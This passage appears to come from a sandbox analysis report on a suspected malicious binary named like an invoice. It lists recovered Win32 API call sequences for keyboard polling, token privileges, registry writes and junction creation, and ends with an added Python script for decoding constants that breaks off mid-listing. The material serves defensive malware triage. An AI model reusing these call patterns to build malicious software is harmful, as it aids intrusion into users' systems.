                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: LongNamePath_memmove
                                          • String ID:
                                          • API String ID: 2514874351-0
                                          • Opcode ID: 5311bc10bcd02c3da6376a961da6fa5eeea3c1e89524b7fc1d9ecfef85fbf38f
                                          • Instruction ID: 9246c12fdc37fcd41ca4db90d4c6e7f6585ba1f285f6c4ea688713946de2f6cd
                                          • Opcode Fuzzy Hash: 5311bc10bcd02c3da6376a961da6fa5eeea3c1e89524b7fc1d9ecfef85fbf38f
                                          • Instruction Fuzzy Hash: F5E0263290012817C720E2599C05FEA77ACDF882A0F0401BAFC0CD3204D964AC808694
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: __wfsopen
                                          • String ID:
                                          • API String ID: 197181222-0
                                          • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                          • Instruction ID: 26467e9723955137fe9c45439b6ceb4f873de5a2d7ef111d81715968119f48b2
                                          • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                          • Instruction Fuzzy Hash: 99B0927654020CB7CE012A82FC02A593B199B41768F8080A1FB0C181A2A677A6649A99
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1343224751.0000000000E9B000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E9B000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e9b000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Sleep
                                          • String ID:
                                          • API String ID: 3472027048-0
                                          • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                          • Instruction ID: b5da04e8374de124d6b1277a98e128d9332d634d628fe23c07ff774682dffb10
                                          • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                          • Instruction Fuzzy Hash: 3FE0E67494410DDFDB00EFB4D94969E7FB4EF04301F100161FD01E2280D7309D508A62
                                          APIs
                                            • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                          • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0048CB37
                                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0048CB95
                                          • GetWindowLongW.USER32(?,000000F0), ref: 0048CBD6
                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0048CC00
                                          • SendMessageW.USER32 ref: 0048CC29
                                          • _wcsncpy.LIBCMT ref: 0048CC95
                                          • GetKeyState.USER32(00000011), ref: 0048CCB6
                                          • GetKeyState.USER32(00000009), ref: 0048CCC3
                                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0048CCD9
                                          • GetKeyState.USER32(00000010), ref: 0048CCE3
                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0048CD0C
                                          • SendMessageW.USER32 ref: 0048CD33
                                          • SendMessageW.USER32(?,00001030,?,0048B348), ref: 0048CE37
                                          • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0048CE4D
                                          • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0048CE60
                                          • SetCapture.USER32(?), ref: 0048CE69
                                          • ClientToScreen.USER32(?,?), ref: 0048CECE
                                          • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0048CEDB
                                          • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0048CEF5
                                          • ReleaseCapture.USER32 ref: 0048CF00
                                          • GetCursorPos.USER32(?), ref: 0048CF3A
                                          • ScreenToClient.USER32(?,?), ref: 0048CF47
                                          • SendMessageW.USER32(?,00001012,00000000,?), ref: 0048CFA3
                                          • SendMessageW.USER32 ref: 0048CFD1
                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 0048D00E
                                          • SendMessageW.USER32 ref: 0048D03D
                                          • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0048D05E
                                          • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0048D06D
                                          • GetCursorPos.USER32(?), ref: 0048D08D
                                          • ScreenToClient.USER32(?,?), ref: 0048D09A
                                          • GetParent.USER32(?), ref: 0048D0BA
                                          • SendMessageW.USER32(?,00001012,00000000,?), ref: 0048D123
                                          • SendMessageW.USER32 ref: 0048D154
                                          • ClientToScreen.USER32(?,?), ref: 0048D1B2
                                          • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0048D1E2
                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 0048D20C
                                          • SendMessageW.USER32 ref: 0048D22F
                                          • ClientToScreen.USER32(?,?), ref: 0048D281
                                          • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0048D2B5
                                            • Part of subcall function 004025DB: GetWindowLongW.USER32(?,000000EB), ref: 004025EC
                                          • GetWindowLongW.USER32(?,000000F0), ref: 0048D351
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                          • String ID: @GUI_DRAGID$F$pbL
                                          • API String ID: 3977979337-2097280626
                                          • Opcode ID: 4f16bd0a54bb31305c98b4c410e4e88b7a309b179b874218d8dc8bbaa358dfdb
                                          • Instruction ID: aa2ec0652ddf211ac3aa7531e5acae26c7b16f0e73498be5a03c601873f34f9f
                                          • Opcode Fuzzy Hash: 4f16bd0a54bb31305c98b4c410e4e88b7a309b179b874218d8dc8bbaa358dfdb
                                          • Instruction Fuzzy Hash: FE42DE74604640AFC720EF24D888EAEBBE5FF48310F140A2EF559973A1C735E855DB6A
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: _memmove$_memset
                                          • String ID: ]K$3cA$DEFINE$P\K$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)$_A
                                          • API String ID: 1357608183-1426331590
                                          • Opcode ID: b28a790e45669a4902d64bf1598fd7c3bcb7bf2305bb98875f8069baf6f44106
                                          • Instruction ID: 24ac3008a4780d7342888deeabfce4e0a58b67e9339f094d14e98286774badb8
                                          • Opcode Fuzzy Hash: b28a790e45669a4902d64bf1598fd7c3bcb7bf2305bb98875f8069baf6f44106
                                          • Instruction Fuzzy Hash: A193A471A002199BDB24CF58C8817EEB7B1FF48315F24815BED45AB392E7789D86CB48
                                          APIs
                                          • GetForegroundWindow.USER32(00000000,?), ref: 004048DF
                                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0043D665
                                          • IsIconic.USER32(?), ref: 0043D66E
                                          • ShowWindow.USER32(?,00000009), ref: 0043D67B
                                          • SetForegroundWindow.USER32(?), ref: 0043D685
                                          • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0043D69B
                                          • GetCurrentThreadId.KERNEL32 ref: 0043D6A2
                                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 0043D6AE
                                          • AttachThreadInput.USER32(?,00000000,00000001), ref: 0043D6BF
                                          • AttachThreadInput.USER32(?,00000000,00000001), ref: 0043D6C7
                                          • AttachThreadInput.USER32(00000000,?,00000001), ref: 0043D6CF
                                          • SetForegroundWindow.USER32(?), ref: 0043D6D2
                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043D6E7
                                          • keybd_event.USER32(00000012,00000000), ref: 0043D6F2
                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043D6FC
                                          • keybd_event.USER32(00000012,00000000), ref: 0043D701
                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043D70A
                                          • keybd_event.USER32(00000012,00000000), ref: 0043D70F
                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043D719
                                          • keybd_event.USER32(00000012,00000000), ref: 0043D71E
                                          • SetForegroundWindow.USER32(?), ref: 0043D721
                                          • AttachThreadInput.USER32(?,?,00000000), ref: 0043D748
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                          • String ID: Shell_TrayWnd
                                          • API String ID: 4125248594-2988720461
                                          • Opcode ID: c65cf632393a49513bea40c5a00901192d62317a1410f3ef3d84c68e5820f373
                                          • Instruction ID: c1ca6a344bcdfaba0e974823023d667c19296b4d148af4653ab9434bf50545cf
                                          • Opcode Fuzzy Hash: c65cf632393a49513bea40c5a00901192d62317a1410f3ef3d84c68e5820f373
                                          • Instruction Fuzzy Hash: AE319671A40318BBEB206F619C49F7F7F6CEB48B50F10443AFA04EA1D1D6B45D11ABA9
                                          APIs
                                            • Part of subcall function 004587E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0045882B
                                            • Part of subcall function 004587E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00458858
                                            • Part of subcall function 004587E1: GetLastError.KERNEL32 ref: 00458865
                                          • _memset.LIBCMT ref: 00458353
                                          • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 004583A5
                                          • CloseHandle.KERNEL32(?), ref: 004583B6
                                          • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004583CD
                                          • GetProcessWindowStation.USER32 ref: 004583E6
                                          • SetProcessWindowStation.USER32(00000000), ref: 004583F0
                                          • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0045840A
                                            • Part of subcall function 004581CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00458309), ref: 004581E0
                                            • Part of subcall function 004581CB: CloseHandle.KERNEL32(?,?,00458309), ref: 004581F2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                          • String ID: $default$winsta0
                                          • API String ID: 2063423040-1027155976
                                          • Opcode ID: 007e003301226a36e1941e8713d92a1d8206d02883a1c24a6694a0b4fadf7aa5
                                          • Instruction ID: 3323b63beeccf06d974511bf231c05544c13643482a2b8641c754c26865e528a
                                          • Opcode Fuzzy Hash: 007e003301226a36e1941e8713d92a1d8206d02883a1c24a6694a0b4fadf7aa5
                                          • Instruction Fuzzy Hash: F3814871900209BFDF119FA5DC45AEE7B78AF08305F14416EFC10B6262EF399A19DB28
                                          APIs
                                          • FindFirstFileW.KERNEL32(?,?), ref: 0046C78D
                                          • FindClose.KERNEL32(00000000), ref: 0046C7E1
                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0046C806
                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0046C81D
                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 0046C844
                                          • __swprintf.LIBCMT ref: 0046C890
                                          • __swprintf.LIBCMT ref: 0046C8D3
                                            • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                          • __swprintf.LIBCMT ref: 0046C927
                                            • Part of subcall function 00423698: __woutput_l.LIBCMT ref: 004236F1
                                          • __swprintf.LIBCMT ref: 0046C975
                                            • Part of subcall function 00423698: __flsbuf.LIBCMT ref: 00423713
                                            • Part of subcall function 00423698: __flsbuf.LIBCMT ref: 0042372B
                                          • __swprintf.LIBCMT ref: 0046C9C4
                                          • __swprintf.LIBCMT ref: 0046CA13
                                          • __swprintf.LIBCMT ref: 0046CA62
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                          • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                          • API String ID: 3953360268-2428617273
                                          • Opcode ID: 511509d096d8a85c851f2d3f16a46ec9b1aa2dd11cc0fa5b5634bac435d16de7
                                          • Instruction ID: 7d9c3182f1c50569ad22dcb29b7867164fdd6ce968260aea251e7ba13e5350ae
                                          • Opcode Fuzzy Hash: 511509d096d8a85c851f2d3f16a46ec9b1aa2dd11cc0fa5b5634bac435d16de7
                                          • Instruction Fuzzy Hash: AFA13EB1504304ABC710EFA5C885DAFB7ECFF94708F40492EF585D6192EA38DA08CB66
                                          APIs
                                          • FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 0046EFB6
                                          • _wcscmp.LIBCMT ref: 0046EFCB
                                          • _wcscmp.LIBCMT ref: 0046EFE2
                                          • GetFileAttributesW.KERNEL32(?), ref: 0046EFF4
                                          • SetFileAttributesW.KERNEL32(?,?), ref: 0046F00E
                                          • FindNextFileW.KERNEL32(00000000,?), ref: 0046F026
                                          • FindClose.KERNEL32(00000000), ref: 0046F031
                                          • FindFirstFileW.KERNEL32(*.*,?), ref: 0046F04D
                                          • _wcscmp.LIBCMT ref: 0046F074
                                          • _wcscmp.LIBCMT ref: 0046F08B
                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 0046F09D
                                          • SetCurrentDirectoryW.KERNEL32(004B8920), ref: 0046F0BB
                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 0046F0C5
                                          • FindClose.KERNEL32(00000000), ref: 0046F0D2
                                          • FindClose.KERNEL32(00000000), ref: 0046F0E4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                          • String ID: *.*
                                          • API String ID: 1803514871-438819550
                                          • Opcode ID: 6ca42bdee5e764a2d4c938babfd9147ccfee36eb28773e9f100ec5c7d0d625b2
                                          • Instruction ID: e0d4b25dfa95f140917fd6c0b332215adfde449a0ea65fd213ed944f24ec6cf3
                                          • Opcode Fuzzy Hash: 6ca42bdee5e764a2d4c938babfd9147ccfee36eb28773e9f100ec5c7d0d625b2
                                          • Instruction Fuzzy Hash: EC31E7325011187ADF14EFA4EC48AEF77AC9F44360F10057BE844D2191EB79DA88CB6E
                                          APIs
                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00480953
                                          • RegCreateKeyExW.ADVAPI32(?,?,00000000,0048F910,00000000,?,00000000,?,?), ref: 004809C1
                                          • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00480A09
                                          • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00480A92
                                          • RegCloseKey.ADVAPI32(?), ref: 00480DB2
                                          • RegCloseKey.ADVAPI32(00000000), ref: 00480DBF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Close$ConnectCreateRegistryValue
                                          • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                          • API String ID: 536824911-966354055
                                          • Opcode ID: d0f75a01e482a49b07148aa577a98b6e9a5d0e4f819e1f39863cc972e1e4a9db
                                          • Instruction ID: 75f0257f13d9dd97868b06569ad7b6a65722ecc89240c550ead6eefe92fcdcfb
                                          • Opcode Fuzzy Hash: d0f75a01e482a49b07148aa577a98b6e9a5d0e4f819e1f39863cc972e1e4a9db
                                          • Instruction Fuzzy Hash: 3E023A756106119FCB54EF15D841E2AB7E5FF89314F04886EF8899B3A2CB38EC45CB89
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 0DJ$0EJ$0FJ$3cA$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$pGJ$_A
                                          • API String ID: 0-559809668
                                          • Opcode ID: 6a8c43c5cd2287656802195d535ea908290b48d8ab3bfd826a36c9d68e310c78
                                          • Instruction ID: 6096d484c95c14ad7aa8192e29e4e3e8d71b99b3f093478e4f466f6acf52d5c9
                                          • Opcode Fuzzy Hash: 6a8c43c5cd2287656802195d535ea908290b48d8ab3bfd826a36c9d68e310c78
                                          • Instruction Fuzzy Hash: 13727E75E002199BDB14CF59C8807EEB7B5FF48311F15816BE809EB291E7389E85CB98
                                          APIs
                                          • FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 0046F113
                                          • _wcscmp.LIBCMT ref: 0046F128
                                          • _wcscmp.LIBCMT ref: 0046F13F
                                            • Part of subcall function 00464385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 004643A0
                                          • FindNextFileW.KERNEL32(00000000,?), ref: 0046F16E
                                          • FindClose.KERNEL32(00000000), ref: 0046F179
                                          • FindFirstFileW.KERNEL32(*.*,?), ref: 0046F195
                                          • _wcscmp.LIBCMT ref: 0046F1BC
                                          • _wcscmp.LIBCMT ref: 0046F1D3
                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 0046F1E5
                                          • SetCurrentDirectoryW.KERNEL32(004B8920), ref: 0046F203
                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 0046F20D
                                          • FindClose.KERNEL32(00000000), ref: 0046F21A
                                          • FindClose.KERNEL32(00000000), ref: 0046F22C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                          • String ID: *.*
                                          • API String ID: 1824444939-438819550
                                          • Opcode ID: 5e4c1ca136502ca1550e0c7352cbc5842e7fcfe98f56b9ff86b85f6952a77760
                                          • Instruction ID: 359f8111c83e04d014ff149dee767818393646aa3285bf91305061d844a33625
                                          • Opcode Fuzzy Hash: 5e4c1ca136502ca1550e0c7352cbc5842e7fcfe98f56b9ff86b85f6952a77760
                                          • Instruction Fuzzy Hash: 1031C3365001196ADF10AEA4FC54AEE77AC9F45360F2005BBE844A2190EA39DE89CA6D
                                          APIs
                                          • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0046A20F
                                          • __swprintf.LIBCMT ref: 0046A231
                                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 0046A26E
                                          • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0046A293
                                          • _memset.LIBCMT ref: 0046A2B2
                                          • _wcsncpy.LIBCMT ref: 0046A2EE
                                          • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0046A323
                                          • CloseHandle.KERNEL32(00000000), ref: 0046A32E
                                          • RemoveDirectoryW.KERNEL32(?), ref: 0046A337
                                          • CloseHandle.KERNEL32(00000000), ref: 0046A341
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                          • String ID: :$\$\??\%s
                                          • API String ID: 2733774712-3457252023
                                          • Opcode ID: f5c4c2d66afbbd10ee5f85d9a25c73fd31d49a88663bd8fadf72adc8619a6d0a
                                          • Instruction ID: f10b276181cf8096dd79107661fba1eb4aa855f6953dd7c4d63ebe7d830bec3b
                                          • Opcode Fuzzy Hash: f5c4c2d66afbbd10ee5f85d9a25c73fd31d49a88663bd8fadf72adc8619a6d0a
                                          • Instruction Fuzzy Hash: 1E31C571500119ABDB20DFA0DC49FEF77BCEF88704F1044BAF908E2260E77496948B29
                                          APIs
                                          • GetKeyboardState.USER32(?), ref: 00460097
                                          • SetKeyboardState.USER32(?), ref: 00460102
                                          • GetAsyncKeyState.USER32(000000A0), ref: 00460122
                                          • GetKeyState.USER32(000000A0), ref: 00460139
                                          • GetAsyncKeyState.USER32(000000A1), ref: 00460168
                                          • GetKeyState.USER32(000000A1), ref: 00460179
                                          • GetAsyncKeyState.USER32(00000011), ref: 004601A5
                                          • GetKeyState.USER32(00000011), ref: 004601B3
                                          • GetAsyncKeyState.USER32(00000012), ref: 004601DC
                                          • GetKeyState.USER32(00000012), ref: 004601EA
                                          • GetAsyncKeyState.USER32(0000005B), ref: 00460213
                                          • GetKeyState.USER32(0000005B), ref: 00460221
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: State$Async$Keyboard
                                          • String ID:
                                          • API String ID: 541375521-0
                                          • Opcode ID: f2f36dec6c4a46bfceebef3e5bbc60e354e372eebad2095a13b7bb07ab711d72
                                          • Instruction ID: c6705f0abb03acfe1c66d12a8beead0d319d3067caf51b1e954f1b2a293a3a50
                                          • Opcode Fuzzy Hash: f2f36dec6c4a46bfceebef3e5bbc60e354e372eebad2095a13b7bb07ab711d72
                                          • Instruction Fuzzy Hash: 7F51BC2090478829FB35D7A098547EBBFB49F12380F08459F99C2566C3FA5C9A8CC75B
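The two listings above carry more information than the raw hex suggests. In the function at ref 0046A20F, the CreateFileW flags 02200000 decode to FILE_FLAG_BACKUP_SEMANTICS|FILE_FLAG_OPEN_REPARSE_POINT and the DeviceIoControl code 000900A4 decodes to FSCTL_SET_REPARSE_POINT (device FILE_DEVICE_FILE_SYSTEM, function 41, METHOD_BUFFERED); together with GetFullPathNameW, CreateDirectoryW, the `\??\%s` string and the RemoveDirectoryW fallback, that is the standard sequence for creating an NTFS reparse point (junction) on a freshly created directory and removing the directory if the control code fails. In the function at ref 00460097, the virtual-key codes 000000A0, 000000A1, 00000011, 00000012 and 0000005B are VK_LSHIFT, VK_RSHIFT, VK_CONTROL, VK_MENU (Alt) and VK_LWIN, so that routine polls modifier keys only. One caveat applies to both: the report flags the binary as a likely compiled AutoIt script, and functions recovered from the interpreter stub describe capabilities of the runtime that are present regardless of what the embedded script calls; treat them as capability, not observed behaviour, unless the dynamic traces confirm the calls. The script below is an added example written for this page, not Joe Sandbox tooling and not code from the sample. It parses "APIs" lines in the format shown above (the sample lines are copied verbatim from this report) and decodes the constants that matter for triage; the decode tables cover only values taken from the Windows SDK headers, and unknown bits are left as hex rather than guessed.

```python
"""Decode Win32 constants in Joe Sandbox "APIs" listings (added example, not Joe Sandbox code)."""
import re

API_LINE = re.compile(
    r"(?P<api>\w+)\.(?P<module>[A-Za-z0-9_]+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

# CTL_CODE(DeviceType, Function, Method, Access): 16 | 2 | 12 | 2 bits, high to low.
IOCTL_METHOD = {0: "METHOD_BUFFERED", 1: "METHOD_IN_DIRECT", 2: "METHOD_OUT_DIRECT", 3: "METHOD_NEITHER"}
IOCTL_ACCESS = {0: "FILE_ANY_ACCESS", 1: "FILE_READ_ACCESS", 2: "FILE_WRITE_ACCESS",
                3: "FILE_READ_ACCESS|FILE_WRITE_ACCESS"}
IOCTL_DEVICE = {0x07: "FILE_DEVICE_DISK", 0x09: "FILE_DEVICE_FILE_SYSTEM", 0x22: "FILE_DEVICE_UNKNOWN"}
KNOWN_IOCTL = {0x000900A4: "FSCTL_SET_REPARSE_POINT", 0x000900A8: "FSCTL_GET_REPARSE_POINT",
               0x000900AC: "FSCTL_DELETE_REPARSE_POINT"}
GENERIC = {0x10000000: "GENERIC_ALL", 0x20000000: "GENERIC_EXECUTE",
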